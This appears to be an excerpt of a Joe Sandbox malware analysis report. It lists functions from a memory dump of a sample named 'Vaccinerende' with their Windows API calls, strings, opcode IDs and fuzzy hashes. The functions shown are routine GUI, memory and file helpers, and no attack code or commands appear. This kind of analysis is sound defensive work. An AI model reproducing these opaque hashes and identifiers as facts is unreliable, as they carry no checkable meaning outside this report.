                                            • API String ID: 2754987064-0
                                            • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                            • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                            • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                            • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                            Function 00402FB2 Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 00402FD7
                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                            • strlen.MSVCRT ref: 00403006
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                            • String ID:
                                            • API String ID: 2754987064-0
                                            • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                            • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                            • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                            • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                            Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                            • String ID:
                                            • API String ID: 764393265-0
                                            • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                            • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                            • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                            • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                            Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Time$System$File$LocalSpecific
                                            • String ID:
                                            • API String ID: 979780441-0
                                            • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                            • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                            • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                            • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                            Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$DialogHandleModuleParam
                                            • String ID:
                                            • API String ID: 1386444988-0
                                            • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                            • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                            • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                            • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                            Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??3@YAXPAX@Z.MSVCRT(020B0048), ref: 0044DF01
                                            • ??3@YAXPAX@Z.MSVCRT(009072E0), ref: 0044DF11
                                            • ??3@YAXPAX@Z.MSVCRT(00907AF0), ref: 0044DF21
                                            • ??3@YAXPAX@Z.MSVCRT(009076E8), ref: 0044DF31
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                            Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: InvalidateMessageRectSend
                                            • String ID: d=E
                                            • API String ID: 909852535-3703654223
                                            • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                            • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                            • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                            • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                            Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                            Download Yara Rule
                                            APIs
                                            • wcschr.MSVCRT ref: 0040F79E
                                            • wcschr.MSVCRT ref: 0040F7AC
                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcschr$memcpywcslen
                                            • String ID: "
                                            • API String ID: 1983396471-123907689
                                            • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                            • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                            • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                            • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                            Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                            • _memicmp.MSVCRT ref: 0040C00D
                                            • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FilePointer_memicmpmemcpy
                                            • String ID: URL
                                            • API String ID: 2108176848-3574463123
                                            • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                            • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                            • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                            • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                            Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            • _snwprintf.MSVCRT ref: 0040A398
                                            • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _snwprintfmemcpy
                                            • String ID: %2.2X
                                            • API String ID: 2789212964-323797159
                                            • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                            • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                            • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                            • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                            Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _snwprintf
                                            • String ID: %%-%d.%ds
                                            • API String ID: 3988819677-2008345750
                                            • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                            • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                            • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                            • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                            Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                            • memset.MSVCRT ref: 00401917
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PlacementWindowmemset
                                            • String ID: WinPos
                                            • API String ID: 4036792311-2823255486
                                            • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                            • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                            • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                            • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                            Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                            • wcsrchr.MSVCRT ref: 0040DCE9
                                            • wcscat.MSVCRT ref: 0040DCFF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileModuleNamewcscatwcsrchr
                                            • String ID: _lng.ini
                                            • API String ID: 383090722-1948609170
                                            • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                            • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                            • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                            • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                            Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                            • API String ID: 2773794195-880857682
                                            • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                            • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                            • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                            • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                            Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                            • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: LongWindow
                                            • String ID: MZ@
                                            • API String ID: 1378638983-2978689999
                                            • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                            • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                            • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                            • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                            Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                            • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                            • memset.MSVCRT ref: 0042BAAE
                                            • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID:
                                            • API String ID: 438689982-0
                                            • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                            • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                            • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                            • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                            Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                            • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                            • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ??2@$memset
                                            • String ID:
                                            • API String ID: 1860491036-0
                                            • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                            • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                            • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                            • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                            Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                            • wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                            • free.MSVCRT ref: 0040A908
                                            • free.MSVCRT ref: 0040A92B
                                            • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$memcpy$mallocwcslen
                                            • String ID:
                                            • API String ID: 726966127-0
                                            • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                            • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                            • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                            • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                            Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                            • wcslen.MSVCRT ref: 0040B1DE
                                            • free.MSVCRT ref: 0040B201
                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                            • free.MSVCRT ref: 0040B224
                                            • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$memcpy$mallocwcslen
                                            • String ID:
                                            • API String ID: 726966127-0
                                            • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
